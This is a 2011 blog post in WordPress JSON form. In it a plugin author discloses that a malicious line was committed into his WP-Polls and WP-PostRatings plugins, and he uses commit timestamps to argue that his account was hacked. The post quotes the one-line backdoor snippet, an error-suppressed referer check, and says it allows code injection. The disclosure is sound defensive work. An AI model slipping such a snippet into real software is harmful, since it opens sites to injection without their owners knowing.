{"id":302,"date":"2011-02-17T19:10:06","date_gmt":"2011-02-17T11:10:06","guid":{"rendered":"http:\/\/lesterchan.net\/wordpress\/?p=302"},"modified":"2011-02-17T19:22:36","modified_gmt":"2011-02-17T11:22:36","slug":"code-injection-follow-up","status":"publish","type":"post","link":"https:\/\/lesterchan.net\/wordpress\/2011\/02\/17\/code-injection-follow-up\/","title":{"rendered":"Code Injection Follow Up"},"content":{"rendered":"<p>I have released 2 security updates to <a href=\"https:\/\/lesterchan.net\/wordpress\/2011\/02\/14\/wp-polls-2-61\/\">WP-Polls<\/a> and <a href=\"https:\/\/lesterchan.net\/wordpress\/2011\/02\/17\/wp-postratings-1-61\/\">WP-PostRatings<\/a> which remove a piece of malicious code that allows code injection.<\/p>\n<p>The malicious code is as follows:<br \/>\n<code><br \/>\nif ($_SERVER['PHP_SELF'] == @links_add_base_url(\"\/\", $_SERVER['HTTP_REFERER']))<br \/>\n  return;<br \/>\n<\/code><\/p>\n<p>The code itself does nothing on its own, but hackers spoof <code>$_SERVER['HTTP_REFERER']<\/code>, which allows arbitrary code injection. Note the @ sign, which suppresses all errors so that no error will ever be displayed.<\/p>\n<p>I am 100% sure, based on the points below, that the code was not added by me. I am beginning to believe that my account was hacked.<\/p>\n<ul>\n<li>Personally, I have no idea what <code>links_add_base_url()<\/code> does, and hence it is impossible for me to have placed it in my own plugin code.<\/li>\n<li>I checked the commit date for the <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307914\">changeset of WP-PostRatings<\/a> and the date\/time is <strong>11\/04\/10 22:10:13<\/strong>. Since I am in the GMT+8 zone, that is 6am for me. I do not wake up at 6am just to update my plugin.<\/li>\n<li>The above changeset is for trunk.
However, in my readme.txt I have stated that the stable tag is 1.50, and hence the file was copied to \/tags\/1.50\/ in <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307952\">this changeset<\/a>. If you note the time, it is <strong>11\/05\/10 00:52:39<\/strong>. This is almost 3 hours after the trunk commit, which is almost 9am in my timezone, when I would be in my office, and my office&#8217;s computer does not have SVN copies of my plugin. So it is also not possible for me to have committed that file.<\/li>\n<li>If you look at the same changeset, the file was copied from trunk to tags\/1.50 using SVN copy. I do not use SVN copy for my plugins; normally I just copy and paste the files using Windows Explorer.<\/li>\n<li>For WP-Polls, there is only <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/308113\">1 changeset<\/a>, as my stable tag is from trunk, and the timestamp is <strong>11\/05\/10 12:30:07<\/strong>. This is about 12 hours after the changeset of WP-PostRatings. In my timezone it is about 8.30pm, and it is not possible for me to check in then because 8pm to 9pm is my dinner time and I always eat out.<\/li>\n<li>For WP-WAP, there are 2 suspicious commits, <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307055\">here<\/a> and <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307063\">here<\/a>. As I do not develop WP-WAP anymore, there is no reason for me to commit anything to it.<\/li>\n<\/ul>\n<p>I am going to review all my commits to the SVN to ensure that no more suspicious code has been added.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I have released 2 security updates to WP-Polls and WP-PostRatings which remove a piece of malicious code that allows code injection.
The malicious code is as follows: if ($_SERVER[&#8216;PHP_SELF&#8217;] == @links_add_base_url(&#8220;\/&#8221;, $_SERVER[&#8216;HTTP_REFERER&#8217;])) return; The code itself does nothing on its own, but hackers spoof $_SERVER[&#8216;HTTP_REFERER&#8217;], which allows arbitrary code injection. Note the @ sign, which suppresses &hellip; <a href=\"https:\/\/lesterchan.net\/wordpress\/2011\/02\/17\/code-injection-follow-up\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Code Injection Follow Up&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[128,127],"class_list":["post-302","post","type-post","status-publish","format-standard","hentry","category-wordpress","tag-vulnerability","tag-xss"],"views":12980,"_links":{"self":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/posts\/302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/comments?post=302"}],"version-history":[{"count":0,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/posts\/302\/revisions"}],"wp:attachment":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/media?parent=302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/categories?post=302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/tags?post=302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}